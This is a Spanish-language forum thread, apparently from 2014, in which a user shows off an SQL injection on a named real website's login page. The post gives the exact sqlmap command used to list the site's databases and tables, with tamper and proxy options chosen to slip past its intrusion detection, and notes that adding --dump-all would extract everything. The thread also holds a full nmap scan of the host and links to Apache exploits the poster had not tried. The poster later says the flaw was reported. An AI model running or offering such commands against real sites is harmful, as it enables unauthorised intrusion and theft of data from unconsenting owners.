Hola a todos , nose si es mi primer post , espero que no, en caso de ser asi, me doy por presentado, y os traigo un regalito:
Web: http://www.idocz.net/Login.php?id='
(http://i57.tinypic.com/10pzsz5.jpg)
Utilice Sqlmap para explotar la vulnerabilidad, acontinuacion pongo los parametro usados para listar las bases de datos y las tablas
C:\sqlmap>sqlmap.py -u "http://www.idocz.net/Login.php?id=" --dbs --dbms=MySQL --ignore-proxy --tamper "space2morehash" -D idocz_web --tables
(http://i61.tinypic.com/2elz8r4.jpg)
utilice la opcion tamper y ignore-proxy porque en el lugar que lo estoy haciendo hay ids , ips y me bloqueba los ataques (No seria necesario), en caso de querer hacer un dumpeado , bastaria con la opcion --dump-all alfinal.
me interese un poco en la version de apache que tiene el servidor que es la Apache 2.2.14 y encontre muchos exploits, os expongo la url de uno de ellos que me parecio interesante , esto no lo he podido probar ya que no dispongo de linux en este momento.
http://www.cvedetails.com/cve/CVE-2013-2249/
y la lista completa para esa version de apache 2.2.14 es:
http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-87506/Apache-Http-Server-2.2.14.html
nose si serva vulnerable a todos pero alguno seguro!!
He intentado ser todo lo explicito que he podido, nose si demasiado, o demasiado poco , en cualquier caso , que los moderadores me digan!
la vulnerabilidad no ha sido reportada.
Espero que os haya resultado interesantem o por lo menos tan interesante como ami hacerlo :D :D :D :D, gracias a todos por este foro!
Muy bueno bro! Le reportaste el fallo al webmaster?
Saludos!
ANTRAX
No, todavia no se lo he reportado, acabo de editar el post poniendo eso precisamente :D :D :D :D
Espero que lo reparen antes de que algun lammer lo explote.
Muy buen trabajo bro!
Saludos!
ANTRAX
Si puedes añadir una captura del reporte estaría genial. Por cierto, no creo que se deban mostrar las tablas (información sensible), con una breve prueba de concepto sobra, saludos.
Os pongo el reporte del nmap que resulta bastante interesante, direis porque usa los parametros -O y -A al mismo tiemop pues nose tengo manias... ;D ;D ;D ;D ;D
[*] exec: nmap -sS -PN -O 184.71.243.98 -A -sC
Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-08 15:35 EDT
Nmap scan report for 184.71.243.98
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Home
443/tcp open ssl/http Apache httpd 2.2.14
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title (text/plain).
| ssl-cert: Subject: commonName=*.idocz.net
| Not valid before: 2014-02-26T13:59:42+00:00
|_Not valid after: 2015-04-02T02:26:31+00:00
|_ssl-date: 2014-05-08T17:27:37+00:00; -2h09m16s from local time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%), Linux 2.6.31 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: Host: pass.idocz.net
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 3.70 ms 192.168.0.1
2 11.03 ms 10.219.32.1
3 13.43 ms 10.127.44.125
4 22.75 ms 10.207.243.53
5 12.49 ms 10.254.5.110
6 13.74 ms mad-b2-link.telia.net (80.239.160.81)
7 118.82 ms prs-bb2-link.telia.net (80.91.245.60)
8 145.40 ms nyk-bb1-link.telia.net (80.91.253.122)
9 140.56 ms chi-bb1-link.telia.net (213.155.136.19)
10 138.85 ms shawbusiness-ic-300305-chi-eqx-i1.c.telia.net (62.115.12.90)
11 148.43 ms rc2nr-hge0-9-0-0.wp.shawcable.net (66.163.77.201)
12 172.47 ms rc3no-tge0-11-0-11.cg.shawcable.net (66.163.64.173)
13 189.71 ms dx2dt-te3.cg.shawcable.net (64.59.132.158)
14 224.01 ms 184.71.243.98
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.28 seconds
Ya he reportado la vulnerabilidad a la pagina web a traves de su correo de contacto, Ya en sus manos queda...